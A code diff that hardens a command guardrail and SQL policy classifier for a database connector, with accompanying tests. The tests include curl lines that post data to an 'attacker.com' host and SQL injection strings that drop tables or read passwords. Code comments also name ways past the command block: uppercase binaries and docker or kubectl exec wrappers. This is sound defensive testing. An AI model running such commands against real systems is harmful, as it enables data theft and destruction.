+    _ADMIN_KEYWORDS.has(w) ||
+    _PRIVILEGE_KEYWORDS.has(w)
+  );
 }
 
 function _presentReason(op: OperationType): string {

--- a/src/connectors/db/lib/query.ts
+++ b/src/connectors/db/lib/query.ts
@@ -109,7 +109,8 @@ export async function executeQuery(
     if (raw.status === "error") {
       return {
         status: "error",
-        error: `${raw.error_code ?? "SQL_ERROR"}: ${raw.error ?? "unknown driver error"}`,
+        error_code: raw.error_code ?? "SQL_ERROR",
+        error: raw.error ?? "unknown driver error",
         execution_time_ms: _elapsedMs(start),
       };
     }
@@ -127,6 +128,7 @@ export async function executeQuery(
   } catch (exc) {
     return {
       status: "error",
+      error_code: "SQL_ERROR",
       error: (exc as Error).message,
       execution_time_ms: _elapsedMs(start),
     };

--- a/src/toolkit/guardrail.ts
+++ b/src/toolkit/guardrail.ts
@@ -64,6 +64,14 @@ export interface BlockMatch {
 
 const SHELLS = new Set<string>(["bash", "sh", "zsh", "ksh", "dash"]);
 
+const CONTAINER_RUNTIMES = new Set<string>(["docker", "podman", "nerdctl"]);
+
+// docker/podman/nerdctl exec|run flags that consume a following argument.
+const CONTAINER_FLAGS_WITH_ARG = new Set<string>([
+  "-u", "--user", "-e", "--env", "-w", "--workdir", "-v", "--volume",
+  "--env-file", "--name", "--entrypoint", "-l", "--label", "-p", "--publish",
+]);
+
 /**
  * Read a guardrail manifest JSON file from disk and validate its shape.
  * Throws on parse/validation errors; the caller is responsible for fail-open
@@ -143,22 +151,37 @@ export function findBlockingRule(
       continue;
     }
 
-    // Two-token prefix match (e.g., "aws dynamodb").
+    // Recurse into container / remote-exec wrappers (docker/podman/nerdctl
+    // exec|run, kubectl exec … -- cmd). Strip the wrapper + its own flags +
+    // the container/image/pod name, then re-scan the inner command head.
+    const innerExec = unwrapContainerExec(tokens);
+    if (innerExec !== null) {
+      const inner = findBlockingRule(innerExec, manifests, depth + 1);
+      if (inner !== null) return inner;
+      continue;
+    }
+
+    // Two-token prefix match (e.g., "aws dynamodb"). Matched case-insensitively
+    // so an uppercase variant (which resolves to the real binary on a
+    // case-insensitive filesystem) cannot slip past; the original case is kept
+    // in blockedToken for the deny message.
     if (tokens.length >= 2) {
       const twoToken = `${head} ${tokens[1] ?? ""}`;
+      const twoTokenLc = twoToken.toLowerCase();
       for (const m of manifests) {
         for (const r of m.rules) {
-          if (r.block_two_token_command?.includes(twoToken)) {
+          if (r.block_two_token_command?.some((e) => e.toLowerCase() === twoTokenLc)) {
             return { manifest: m, rule: r, blockedToken: twoToken, command };
           }
         }
       }
     }
 
-    // First-token basename match.
+    // First-token basename match (case-insensitive; see note above).
+    const headLc = head.toLowerCase();
     for (const m of manifests) {
       for (const r of m.rules) {
-        if (r.block_first_token_basename?.includes(head)) {
+        if (r.block_first_token_basename?.some((e) => e.toLowerCase() === headLc)) {
           return { manifest: m, rule: r, blockedToken: head, command };
         }
       }
@@ -232,4 +255,34 @@ function unwrapShellDashC(tokens: readonly string[]): string | null {
   let inner = tokens.slice(ci + 1).join(" ").trim();
   inner = inner.replace(/^(['"])([\s\S]*)\1$/, "$2");
   return inner;
+}
+
+function unwrapContainerExec(tokens: readonly string[]): string | null {
+  const head = basename(tokens[0] ?? "").toLowerCase();
+  const sub = (tokens[1] ?? "").toLowerCase();
+
+  // kubectl exec [flags] <pod> [-c container] -- cmd args...
+  if (head === "kubectl" && sub === "exec") {
+    const sep = tokens.indexOf("--");
+    if (sep === -1 || sep + 1 >= tokens.length) return null;
+    return tokens.slice(sep + 1).join(" ").trim();
+  }
+
+  // docker / podman / nerdctl  exec|run  [flags] <container|image> cmd args...
+  if (!CONTAINER_RUNTIMES.has(head)) return null;
+  if (sub !== "exec" && sub !== "run") return null;
+
+  let i = 2;
+  // Skip the wrapper's own flags. Flags that take a separate arg consume the
+  // next token; `--key=value` and bare boolean flags (-i, -t, -d, …) do not.
+  while (i < tokens.length) {
+    const t = tokens[i] ?? "";
+    if (!t.startsWith("-")) break;             // reached container/image name
+    if (t.includes("=")) { i += 1; continue; } // --env=FOO=bar form
+    if (CONTAINER_FLAGS_WITH_ARG.has(t)) { i += 2; continue; }
+    i += 1;                                     // boolean flag (-i, -t, -d, …)
+  }
+  // tokens[i] is the container/image name; the inner command starts after it.
+  if (i + 1 >= tokens.length) return null;
+  return tokens.slice(i + 1).join(" ").trim();
 }

--- a/src/toolkit/guardrail.ts
+++ b/src/toolkit/guardrail.ts
@@ -66,10 +66,37 @@ const SHELLS = new Set<string>(["bash", "sh", "zsh", "ksh", "dash"]);
 
 const CONTAINER_RUNTIMES = new Set<string>(["docker", "podman", "nerdctl"]);
 
-// docker/podman/nerdctl exec|run flags that consume a following argument.
+// docker/podman/nerdctl exec|run flags that consume a following argument in
+// their space-separated form (`--flag value`). The `--flag=value` form is
+// handled separately (a single self-contained token). This list is the common,
+// realistic set; an exotic value flag in space form not listed here can still
+// shift the parser by one token (it then fails open, never closed) — best
+// effort, consistent with this module's default posture.
 const CONTAINER_FLAGS_WITH_ARG = new Set<string>([
-  "-u", "--user", "-e", "--env", "-w", "--workdir", "-v", "--volume",
-  "--env-file", "--name", "--entrypoint", "-l", "--label", "-p", "--publish",
+  // identity / mounts / env / workdir / labels
+  "-u", "--user", "-e", "--env", "--env-file", "-w", "--workdir",
+  "-v", "--volume", "--volume-driver", "--volumes-from", "--mount", "--tmpfs",
+  "--name", "--entrypoint", "-l", "--label", "--label-file", "--annotation",
+  "-p", "--publish", "--expose", "-a", "--attach", "--cidfile", "--link",
+  // network / dns / host
+  "--network", "--net", "--network-alias", "-h", "--hostname", "--domainname",
+  "--add-host", "--ip", "--ip6", "--mac-address",
+  "--dns", "--dns-option", "--dns-search",
+  // resources
+  "-m", "--memory", "--memory-reservation", "--memory-swap", "--kernel-memory",
+  "--cpus", "-c", "--cpu-shares", "--cpu-period", "--cpu-quota",
+  "--cpuset-cpus", "--cpuset-mems", "--pids-limit", "--blkio-weight",
+  "--shm-size", "--ulimit", "--gpus", "--device",
+  // namespaces / security
+  "--pid", "--ipc", "--uts", "--userns", "--cgroupns", "--cgroup-parent",
+  "--group-add", "--security-opt", "--sysctl", "--cap-add", "--cap-drop",
+  // lifecycle / runtime / exec
+  "--detach-keys", "--restart", "--stop-signal", "--stop-timeout",
+  "--pull", "--platform", "--runtime", "--isolation",
+  // logging / health
+  "--log-driver", "--log-opt",
+  "--health-cmd", "--health-interval", "--health-retries",
+  "--health-timeout", "--health-start-period",
 ]);
 
 /**

--- a/tests/connectors/db/credentials.test.ts
+++ b/tests/connectors/db/credentials.test.ts
@@ -142,3 +142,70 @@ describe("wiki_db.credentials", () => {
     }
   });
 });
+
+describe("EnvVarCredentialProvider migration-safe prefix", () => {
+  // Snapshot + clear any legacy/neutral prefixed vars so the "no legacy"
+  // branch is deterministic regardless of the ambient environment.
+  let snapshot: Record<string, string | undefined> = {};
+  let restoreEnv: (() => void) | null = null;
+
+  beforeEach(() => {
+    snapshot = {};
+    for (const k of Object.keys(process.env)) {
+      if (k.startsWith("WIKI_DB_") || k.startsWith("NARAI_DB_")) {
+        snapshot[k] = process.env[k];
+        delete process.env[k];
+      }
+    }
+  });
+
+  afterEach(() => {
+    for (const [k, v] of Object.entries(snapshot)) {
+      if (v === undefined) delete process.env[k];
+      else process.env[k] = v;
+    }
+    if (restoreEnv) {
+      restoreEnv();
+      restoreEnv = null;
+    }
+  });
+
+  it("reads the neutral NARAI_DB_ prefix when no legacy var is set", () => {
+    restoreEnv = patchEnv({
+      NARAI_DB_DEV_USER: "nu",
+      NARAI_DB_DEV_PASSWORD: "np",
+    });
+    const provider = new EnvVarCredentialProvider();
+    expect(provider.get("dev")).toEqual(["nu", "np"]);
+  });
+
+  it("falls back to the legacy WIKI_DB_ prefix when a legacy var is present", () => {
+    restoreEnv = patchEnv({
+      WIKI_DB_DEV_USER: "lu",
+      WIKI_DB_DEV_PASSWORD: "lp",
+    });
+    const provider = new EnvVarCredentialProvider();
+    expect(provider.get("dev")).toEqual(["lu", "lp"]);
+  });
+
+  it("honors an explicit prefix override", () => {
+    restoreEnv = patchEnv({
+      MYAPP_DEV_USER: "ou",
+      MYAPP_DEV_PASSWORD: "op",
+    });
+    const provider = new EnvVarCredentialProvider({ prefix: "MYAPP_" });
+    expect(provider.get("dev")).toEqual(["ou", "op"]);
+  });
+
+  it("names the resolved (neutral) prefix in the missing-var error", () => {
+    const provider = new EnvVarCredentialProvider();
+    try {
+      provider.get("dev");
+      throw new Error("expected EnvironmentVariableMissingError to be thrown");
+    } catch (e) {
+      expect((e as Error).name).toBe("EnvironmentVariableMissingError");
+      expect((e as Error).message).toContain("NARAI_DB_DEV_USER");
+      expect((e as Error).message).not.toContain("WIKI_DB_");
+    }
+  });
+});

--- a/tests/connectors/db/drivers/classify_operation.test.ts
+++ b/tests/connectors/db/drivers/classify_operation.test.ts
@@ -69,6 +69,30 @@ describe("DatabaseDriver.classifyOperation — G-DB-1", () => {
         });
       });
     }
+
+    // Issue #1: bracket handling is dialect-aware. Postgres/MySQL/SQLite/Oracle
+    // treat `[` as ordinary SQL (e.g. ARRAY[...] / int[]), while SQL Server
+    // still rejects it as an ambiguous bracket-quoted identifier.
+    it("postgres allows ARRAY[...] reads", () => {
+      expect(new PostgresDriver().classifyOperation("SELECT ARRAY[1,2,3]")).toBe(
+        OperationType.READ,
+      );
+    });
+    it("mysql allows ARRAY[...] reads", () => {
+      expect(new MysqlDriver().classifyOperation("SELECT ARRAY[1,2,3]")).toBe(
+        OperationType.READ,
+      );
+    });
+    it("sqlite allows ARRAY[...] reads", () => {
+      expect(new SQLiteDriver().classifyOperation("SELECT ARRAY[1,2,3]")).toBe(
+        OperationType.READ,
+      );
+    });
+    it("sqlserver still rejects bracket-quoted identifiers", () => {
+      expect(() =>
+        new SqlServerDriver().classifyOperation("SELECT 1 AS [--]"),
+      ).toThrow(/Ambiguous or unrecognized SQL construct/);
+    });
   });
 
   describe("MongoDriver — envelope form", () => {

--- a/tests/connectors/db/drivers/driver_config_extras.test.ts
+++ b/tests/connectors/db/drivers/driver_config_extras.test.ts
@@ -66,20 +66,27 @@ const pgMocks = vi.hoisted(() => {
   return { MockPool, instances };
 });
 
-vi.mock("pg", () => ({
-  default: {
+vi.mock("pg", () => {
+  const types = {
+    getTypeParser: (_oid: number, _format?: string) => (v: string) => v,
+  };
+  return {
+    default: {
+      Pool: function (config: Record<string, unknown>) {
+        const p = new pgMocks.MockPool(config);
+        pgMocks.instances.push(p);
+        return p;
+      },
+      types,
+    },
     Pool: function (config: Record<string, unknown>) {
       const p = new pgMocks.MockPool(config);
       pgMocks.instances.push(p);
       return p;
     },
-  },
-  Pool: function (config: Record<string, unknown>) {
-    const p = new pgMocks.MockPool(config);
-    pgMocks.instances.push(p);
-    return p;
-  },
-}));
+    types,
+  };
+});
 
 const mssqlMocks = vi.hoisted(() => {
   class MockConnectionPool {

--- a/tests/connectors/db/drivers/test_postgresql.test.ts
+++ b/tests/connectors/db/drivers/test_postgresql.test.ts
@@ -51,9 +51,18 @@ vi.mock("pg", () => ({
       return p as unknown;
     }
   },
+  // Mirror the real `pg` module shape: it re-exports `pg-types` as `types`.
+  // The driver passes this in as the delegation base for buildTypeParsers.
+  types: {
+    getTypeParser: (_oid: number, _format?: string) => (v: string) => v,
+  },
 }));
 
-import { PostgresDriver } from "../../../../src/connectors/db/lib/drivers/postgresql.js";
+import {
+  PostgresDriver,
+  buildTypeParsers,
+} from "../../../../src/connectors/db/lib/drivers/postgresql.js";
+import pgTypes from "pg-types";
 
 function latestPool(): InstanceType<typeof mocks.MockPool> {
   const p = mocks.instances[mocks.instances.length - 1];
@@ -381,5 +390,91 @@ describe("wiki_db.drivers.postgresql (unit)", () => {
     // Calling again after shutdown is a no-op (the pool ref is cleared).
     await drv.shutdown();
     expect(pool.endSpy).toHaveBeenCalledTimes(1);
+  });
+
+  // Pool-wiring: the type-parser map is only attached to poolConfig when an
+  // opt-in coercion extra is present, so the default path stays byte-identical.
+  it("connect() with bigint_mode=number wires a types object onto the pool", async () => {
+    const drv = new PostgresDriver();
+    await drv.connect({ database: "app", bigint_mode: "number" });
+    const types = latestPool().config["types"];
+    expect(types).toBeDefined();
+    expect(typeof (types as { getTypeParser: unknown }).getTypeParser).toBe(
+      "function",
+    );
+  });
+
+  it("connect() with no coercion extras leaves the pool without a types key", async () => {
+    const drv = new PostgresDriver();
+    await drv.connect({ database: "app" });
+    expect(latestPool().config).not.toHaveProperty("types");
+  });
+});
+
+describe("buildTypeParsers (pure helper)", () => {
+  // Identity stub: returns the raw text untouched for any OID.
+  const base = {
+    getTypeParser: (_oid: number, _format?: string) => (v: string) => v,
+  };
+
+  it("default (no extras) returns undefined — pg default path untouched", () => {
+    expect(buildTypeParsers({}, base)).toBeUndefined();
+  });
+
+  it("bigint_mode=number coerces in-range int8 to a Number", () => {
+    const p = buildTypeParsers({ bigint_mode: "number" }, base)!;
+    expect(p.getTypeParser(20)("42")).toBe(42);
+    expect(typeof p.getTypeParser(20)("42")).toBe("number");
+  });
+
+  it("bigint_mode=number keeps out-of-range int8 exact (no precision loss)", () => {
+    const p = buildTypeParsers({ bigint_mode: "number" }, base)!;
+    expect(p.getTypeParser(20)("9007199254740993")).toEqual({
+      __bigint__: "9007199254740993",
+    });
+  });
+
+  it("bigint_mode=bigint returns a native BigInt", () => {
+    const p = buildTypeParsers({ bigint_mode: "bigint" }, base)!;
+    expect(p.getTypeParser(20)("9007199254740993")).toBe(
+      9007199254740993n,
+    );
+  });
+
+  it("numeric_mode=number coerces numeric (OID 1700) to a Number", () => {
+    const p = buildTypeParsers({ numeric_mode: "number" }, base)!;
+    expect(p.getTypeParser(1700)("1.50")).toBe(1.5);
+  });
+
+  it("delegates unknown OIDs to the base parser", () => {
+    const p = buildTypeParsers({ numeric_mode: "number" }, base)!;
+    expect(p.getTypeParser(25)("hello")).toBe("hello");
+  });
+
+  it("bytea_encoding=hex returns a lowercase hex string", () => {
+    const p = buildTypeParsers(
+      { bytea_encoding: "hex" },
+      pgTypes as unknown as typeof base,
+    )!;
+    expect(p.getTypeParser(17)("\\x48656c6c6f")).toBe("48656c6c6f");
+  });
+
+  it("bytea_encoding=base64 returns a base64 string", () => {
+    const p = buildTypeParsers(
+      { bytea_encoding: "base64" },
+      pgTypes as unknown as typeof base,
+    )!;
+    expect(p.getTypeParser(17)("\\x48656c6c6f")).toBe("SGVsbG8=");
+  });
+
+  it("no bytea_encoding leaves OID 17 delegating to base (default Buffer)", () => {
+    // With only bigint_mode set, OID 17 is not overridden -> delegates.
+    const p = buildTypeParsers(
+      { bigint_mode: "number" },
+      pgTypes as unknown as typeof base,
+    )!;
+    const out = p.getTypeParser(17)("\\x48656c6c6f");
+    expect(Buffer.isBuffer(out)).toBe(true);
+    expect((out as Buffer).toString()).toBe("Hello");
   });
 });

--- a/tests/connectors/db/framework.test.ts
+++ b/tests/connectors/db/framework.test.ts
@@ -129,6 +129,40 @@ describe("framework envelope translation", () => {
     }
   });
 
+  it("SQL execution error → VALIDATION_ERROR envelope, NOT CONNECTION_ERROR", async () => {
+    const c = buildDbConnector({
+      dispatch: async () => ({
+        status: "error" as const,
+        error_code: "SQL_ERROR",
+        error: 'relation "nope" does not exist',
+        execution_time_ms: 0,
+      }),
+    });
+    const env = await c.fetch("query", { server: "dev", sql: "SELECT * FROM nope" });
+    expect(env.status).toBe("error");
+    if (env.status === "error") {
+      expect(env.error_code).toBe("VALIDATION_ERROR");
+      expect(env.error_code).not.toBe("CONNECTION_ERROR");
+      expect(env.message).toContain("does not exist");
+    }
+  });
+
+  it("real connection failure still maps to CONNECTION_ERROR", async () => {
+    const c = buildDbConnector({
+      dispatch: async () => ({
+        status: "error" as const,
+        error_code: "CONNECTION_ERROR",
+        error: "ECONNREFUSED 127.0.0.1:5432",
+        execution_time_ms: 0,
+      }),
+    });
+    const env = await c.fetch("query", { server: "dev", sql: "SELECT 1" });
+    expect(env.status).toBe("error");
+    if (env.status === "error") {
+      expect(env.error_code).toBe("CONNECTION_ERROR");
+    }
+  });
+
   it("schema action → success envelope with data.tables/table_count", async () => {
     const dbPath = makeFixtureDb();
     const env = await connector.fetch("schema", { sqlite_path: dbPath });

--- a/tests/connectors/db/grant_store.test.ts
+++ b/tests/connectors/db/grant_store.test.ts
@@ -148,6 +148,23 @@ describe("Policy with injected FileGrantStore", () => {
 });
 
 describe("grantStorePathFor", () => {
+  // Redirect ~/.config by overriding HOME so the path helpers resolve under a
+  // throwaway home, isolated from the real one and from the legacy dir.
+  let homeDir: string;
+  let origHome: string | undefined;
+
+  beforeEach(() => {
+    homeDir = fs.mkdtempSync(path.join(os.tmpdir(), "db-grant-home-"));
+    origHome = process.env["HOME"];
+    process.env["HOME"] = homeDir;
+  });
+
+  afterEach(() => {
+    if (origHome === undefined) delete process.env["HOME"];
+    else process.env["HOME"] = origHome;
+    fs.rmSync(homeDir, { recursive: true, force: true });
+  });
+
   it("keys distinct servers to distinct files (no cross-target leakage)", () => {
     expect(grantStorePathFor("staging")).not.toBe(grantStorePathFor("prod"));
   });
@@ -159,7 +176,29 @@ describe("grantStorePathFor", () => {
     const base = path.basename(p);
     expect(base).not.toContain(path.sep);
     expect(base).not.toContain("/");
-    expect(path.dirname(p).endsWith(path.join("wiki_db", "grants"))).toBe(true);
+    expect(
+      path.dirname(p).endsWith(path.join("narai", "db", "grants")),
+    ).toBe(true);
+  });
+
+  it("uses the neutral default dir when no legacy dir exists", () => {
+    const p = grantStorePathFor("prod");
+    expect(p.endsWith(path.join("narai", "db", "grants", "prod.json"))).toBe(
+      true,
+    );
+  });
+
+  it("falls back to the legacy dir when ~/.config/wiki_db exists", () => {
+    fs.mkdirSync(path.join(homeDir, ".config", "wiki_db"), {
+      recursive: true,
+    });
+    const p = grantStorePathFor("prod");
+    expect(p.endsWith(path.join("wiki_db", "grants", "prod.json"))).toBe(true);
+  });
+
+  it("honors an explicit base dir override", () => {
+    const p = grantStorePathFor("prod", "/custom/base");
+    expect(p).toBe(path.join("/custom/base", "grants", "prod.json"));
   });
 });
 

--- a/tests/connectors/db/policy.test.ts
+++ b/tests/connectors/db/policy.test.ts
@@ -8,6 +8,7 @@
 import { describe, it, expect } from "vitest";
 
 import {
+  classifySqlKeywords,
   Decision,
   grantFromEnv,
   OperationType,
@@ -125,6 +126,36 @@ describe("TestClassifySQL", () => {
   it("test_classify_cte", () => {
     const sql = "WITH cte AS (SELECT 1) SELECT * FROM cte";
     expect(policyAuto().classifySql(sql)).toBe(OperationType.READ);
+  });
+
+  // Issue #10: standalone VALUES and TABLE are read-only statements.
+  it("test_classify_values", () => {
+    expect(policyAuto().classifySql("VALUES (1),(2)")).toBe(OperationType.READ);
+  });
+
+  it("test_classify_table", () => {
+    expect(policyAuto().classifySql("TABLE users")).toBe(OperationType.READ);
+  });
+
+  // Issue #4: data-modifying CTEs must escalate beyond READ.
+  it("test_classify_cte_delete_escalates_to_delete", () => {
+    const sql = "WITH x AS (DELETE FROM users RETURNING *) SELECT * FROM x";
+    expect(classifySqlKeywords(sql)).toBe(OperationType.DELETE);
+  });
+
+  it("test_classify_cte_update_escalates_to_write", () => {
+    const sql = "WITH x AS (UPDATE t SET a=1 RETURNING *) SELECT * FROM x";
+    expect(classifySqlKeywords(sql)).toBe(OperationType.WRITE);
+  });
+
+  it("test_classify_cte_insert_escalates_to_write", () => {
+    const sql = "WITH x AS (INSERT INTO t VALUES (1) RETURNING *) SELECT * FROM x";
+    expect(classifySqlKeywords(sql)).toBe(OperationType.WRITE);
+  });
+
+  it("test_classify_cte_string_literal_keyword_stays_read", () => {
+    const sql = "WITH x AS (SELECT 'DELETE FROM users') SELECT * FROM x";
+    expect(classifySqlKeywords(sql)).toBe(OperationType.READ);
   });
 });
 
@@ -254,6 +285,40 @@ describe("TestDecisionLogic", () => {
       expect(result.formatted_sql).not.toBeNull();
       expect(result.formatted_sql.toUpperCase()).toContain("DELETE");
     }
+  });
+
+  // Issue #4: a data-modifying CTE must not be auto-approved as a read.
+  it("test_data_modifying_cte_is_not_allowed", () => {
+    const result = policyAuto().checkQuery(
+      "WITH x AS (DELETE FROM users RETURNING *) SELECT * FROM x",
+    );
+    expect(result.decision).toBe(Decision.PRESENT_ONLY);
+  });
+
+  // Issue #10: standalone VALUES / TABLE reads are allowed under auto.
+  it("test_values_constructor_allowed", () => {
+    const result = policyAuto().checkQuery("VALUES (1),(2)");
+    expect(result.decision).toBe(Decision.ALLOW);
+  });
+
+  it("test_table_shorthand_allowed", () => {
+    const result = policyAuto().checkQuery("TABLE users");
+    expect(result.decision).toBe(Decision.ALLOW);
+  });
+
+  // Issue #9: an unrecognized leading keyword is still treated as ADMIN
+  // (safety floor) but the reason makes clear it was unrecognized.
+  it("test_unrecognized_keyword_tagged_in_reason", () => {
+    const result = policyAuto().checkQuery("SELEKT 1");
+    expect(result.decision).toBe(Decision.PRESENT_ONLY);
+    expect(result.reason).toMatch(/Unrecognized leading keyword/i);
+  });
+
+  it("test_genuine_admin_keeps_original_reason", () => {
+    const result = policyAuto().checkQuery("DROP TABLE users");
+    expect(result.decision).toBe(Decision.PRESENT_ONLY);
+    expect(result.reason).toMatch(/displayed but not executed/);
+    expect(result.reason).not.toMatch(/Unrecognized leading keyword/i);
   });
 
   it("test_grant_active_after_add", () => {

--- a/tests/connectors/db/policy_rules.test.ts
+++ b/tests/connectors/db/policy_rules.test.ts
@@ -106,6 +106,14 @@ describe("PolicyRules: ADMIN overrides (safety floor permits escalate/present)",
     );
     expect(result.decision).toBe(Decision.ESCALATE);
   });
+
+  // Issue #9: an unrecognized leading keyword falls through to the ADMIN
+  // safety floor; under admin: deny the reason flags it as unrecognized.
+  it("admin: deny on an unrecognized keyword tags the reason", () => {
+    const result = policy({ admin: "deny" }).checkQuery("SELEKT 1");
+    expect(result.decision).toBe(Decision.DENY);
+    expect(result.reason).toMatch(/Unrecognized leading keyword/i);
+  });
 });
 
 describe("PolicyRules: PRIVILEGE overrides", () => {

--- a/tests/connectors/db/policy_security.test.ts
+++ b/tests/connectors/db/policy_security.test.ts
@@ -1,5 +1,5 @@
 import { describe, expect, it } from "vitest";
-import { classifyStatements, Policy } from "../../../src/connectors/db/lib/policy.js";
+import { classifyStatements, Decision, Policy } from "../../../src/connectors/db/lib/policy.js";
 
 describe("SQL policy parser security", () => {
   it("safely handles comments masquerading as strings", () => {
@@ -72,6 +72,42 @@ describe("SQL policy parser security", () => {
 
     const sql3 = "SELECT 1 /*M!100000 UNION SELECT password FROM users */;";
     expect(() => classifyStatements(sql3)).toThrow(/Ambiguous or unrecognized SQL construct/);
+  });
+
+  it("preserves the bracket defense for the sqlserver dialect", () => {
+    // The SQL Server bracket-identifier bypass must still be rejected when the
+    // configured dialect is sqlserver.
+    const sql = "SELECT 1 AS [--]; DROP TABLE users;";
+    expect(() => classifyStatements(sql, "sqlserver")).toThrow(
+      /Ambiguous or unrecognized SQL construct/,
+    );
+  });
+
+  it("allows legitimate Postgres array brackets when dialect is postgres", () => {
+    expect(classifyStatements("SELECT ARRAY[1,2,3]", "postgres")).toEqual([
+      "read",
+    ]);
+    expect(classifyStatements("SELECT '{1}'::int[]", "postgres")).toEqual([
+      "read",
+    ]);
+  });
+
+  it("allows array brackets for mysql/sqlite/oracle dialects too", () => {
+    expect(classifyStatements("SELECT ARRAY[1,2,3]", "mysql")).toEqual(["read"]);
+    expect(classifyStatements("SELECT ARRAY[1,2,3]", "sqlite")).toEqual(["read"]);
+    expect(classifyStatements("SELECT ARRAY[1,2,3]", "oracle")).toEqual(["read"]);
+  });
+
+  it("still rejects executable comments regardless of dialect", () => {
+    expect(() => classifyStatements("SELECT 1 /*!50000 */", "postgres")).toThrow(
+      /Ambiguous or unrecognized SQL construct/,
+    );
+  });
+
+  it("end-to-end: postgres dialect allows a bounded ARRAY read", () => {
+    const p = new Policy("auto", undefined, undefined, "postgres");
+    const r = p.checkQuery("SELECT ARRAY[1,2,3] FROM t WHERE id=1");
+    expect(r.decision).toBe(Decision.ALLOW);
   });
 
   it("throws error for SQL Server nested block comments", () => {

--- a/tests/connectors/db/query.test.ts
+++ b/tests/connectors/db/query.test.ts
@@ -311,7 +311,7 @@ describe("TestExecuteQueryAsyncPath", () => {
     expect(result["truncated"]).toBe(true);
   });
 
-  it("maps executeReadAsync error result to status=error with error_code", async () => {
+  it("propagates driver error_code structurally (not flattened into error)", async () => {
     const { driver } = _makeAsyncDriver({
       result: {
         status: "error",
@@ -322,16 +322,17 @@ describe("TestExecuteQueryAsyncPath", () => {
     });
     const result = await executeQuery(driver, "SELECT 1", _autoPolicy());
     expect(result["status"]).toBe("error");
-    expect(result["error"] as string).toContain("SQL_ERROR");
-    expect(result["error"] as string).toContain("relation does not exist");
+    expect(result["error_code"]).toBe("SQL_ERROR");
+    expect(result["error"]).toBe("relation does not exist");
   });
 
-  it("catches thrown promises from executeReadAsync", async () => {
+  it("catches thrown promises from executeReadAsync with a structured SQL_ERROR code", async () => {
     const { driver } = _makeAsyncDriver({
       error: new Error("pool exhausted"),
     });
     const result = await executeQuery(driver, "SELECT 1", _autoPolicy());
     expect(result["status"]).toBe("error");
+    expect(result["error_code"]).toBe("SQL_ERROR");
     expect(result["error"] as string).toContain("pool exhausted");
   });
 

--- a/tests/plugin-hooks/dispatcher_failclosed.test.ts
+++ b/tests/plugin-hooks/dispatcher_failclosed.test.ts
@@ -77,6 +77,72 @@ describe("applyGatesManifest — uncompilable pattern", () => {
   });
 });
 
+// ── unit: applyGatesManifest pattern flags / ignore_case ──
+describe("applyGatesManifest — pattern flags", () => {
+  const run = (
+    rule: Record<string, unknown>,
+    text: string,
+    enforcement?: string,
+  ) => {
+    const decisions: { decision: string; reason: string }[] = [];
+    applyGatesManifest({ enforcement, rules: [rule] }, "test", text, new Set(), decisions);
+    return decisions;
+  };
+
+  it("ignore_case folds in 'i' (matches uppercase)", () => {
+    const r = run(
+      { name: "imp", decision: "deny", pattern: "import\\s+psycopg2", ignore_case: true },
+      "IMPORT psycopg2",
+    );
+    expect(r).toHaveLength(1);
+    expect(r[0].decision).toBe("deny");
+  });
+
+  it("explicit flags:'i' matches case-insensitively", () => {
+    expect(
+      run({ name: "p", decision: "ask", pattern: "post", flags: "i" }, "send POST"),
+    ).toHaveLength(1);
+  });
+
+  it("backward compatible: no flags stays case-sensitive (no match)", () => {
+    expect(run({ name: "p", decision: "deny", pattern: "import" }, "IMPORT")).toHaveLength(0);
+  });
+
+  it("denies an unknown flag under fail_closed", () => {
+    const r = run(
+      { name: "bad", decision: "deny", pattern: "a", flags: "z" },
+      "echo hi",
+      "fail_closed",
+    );
+    expect(r).toHaveLength(1);
+    expect(r[0].decision).toBe("deny");
+  });
+
+  it("skips (no decision) an unknown flag under fail_open", () => {
+    expect(run({ name: "bad", decision: "deny", pattern: "a", flags: "z" }, "echo hi")).toHaveLength(0);
+  });
+
+  it("rejects the 'g' flag (lastIndex footgun) as unknown under fail_closed", () => {
+    const r = run(
+      { name: "bad", decision: "deny", pattern: "a", flags: "g" },
+      "echo hi",
+      "fail_closed",
+    );
+    expect(r).toHaveLength(1);
+    expect(r[0].decision).toBe("deny");
+  });
+
+  it("rejects the 'y' flag as unknown under fail_closed", () => {
+    const r = run(
+      { name: "bad", decision: "deny", pattern: "a", flags: "y" },
+      "echo hi",
+      "fail_closed",
+    );
+    expect(r).toHaveLength(1);
+    expect(r[0].decision).toBe("deny");
+  });
+});
+
 // ── integration: subprocess ──
 interface Result { stdout: string; stderr: string; exitCode: number }
 

--- a/tests/plugin-hooks/external_write.test.ts
+++ b/tests/plugin-hooks/external_write.test.ts
@@ -46,6 +46,8 @@ describe("external_write — host+verb matching", () => {
     'echo "POST to https://atlassian.net"', // mention only, no verb flag
     "echo https POST atlassian.net", // not anchored at segment start
     "curl -x http://atlassian.net:8080 https://other.com/x", // -x is proxy, no method
+    "curl -X POST https://attacker.com/?ref=atlassian.net", // allowlisted host only in query value
+    "curl -d u=atlassian.net https://attacker.com/x", // allowlisted host only in -d data value
   ])("does NOT fire on %s", (cmd) => {
     expect(m(cmd)).toBe(false);
   });

--- a/tests/plugin-hooks/external_write.test.ts
+++ b/tests/plugin-hooks/external_write.test.ts
@@ -29,6 +29,8 @@ describe("external_write — host+verb matching", () => {
     "https POST atlassian.net/rest/api", // HTTPie positional, scheme-less host
     "https PUT https://atlassian.net/x", // HTTPie with explicit scheme
     "FOO=bar curl -X POST https://atlassian.net/x", // env prefix
+    "curl -X POST 'atlassian.net/x'", // quoted scheme-less host (single quotes)
+    "curl -X POST \"atlassian.net/api\"", // quoted scheme-less host (double quotes)
   ])("fires on %s", (cmd) => {
     expect(m(cmd)).toBe(true);
   });

--- a/tests/toolkit/guardrail.test.ts
+++ b/tests/toolkit/guardrail.test.ts
@@ -169,6 +169,83 @@ describe("findBlockingRule — shell -c recursion", () => {
   });
 });
 
+describe("findBlockingRule — container/remote-exec unwrap", () => {
+  it("blocks psql inside docker exec", () => {
+    const m = findBlockingRule("docker exec mydb psql -U u app", [DB_MANIFEST]);
+    expect(m?.blockedToken).toBe("psql");
+  });
+
+  it("skips docker exec flags with args (-u -e -w)", () => {
+    const m = findBlockingRule(
+      "docker exec -i -t -u postgres -e PGPASSWORD=x -w /tmp mydb psql",
+      [DB_MANIFEST],
+    );
+    expect(m?.blockedToken).toBe("psql");
+  });
+
+  it("handles --env=KEY=VAL form", () => {
+    const m = findBlockingRule("docker exec --env=FOO=bar mydb mysql -u root", [DB_MANIFEST]);
+    expect(m?.blockedToken).toBe("mysql");
+  });
+
+  it("blocks via podman and nerdctl exec", () => {
+    expect(findBlockingRule("podman exec c1 psql", [DB_MANIFEST])?.blockedToken).toBe("psql");
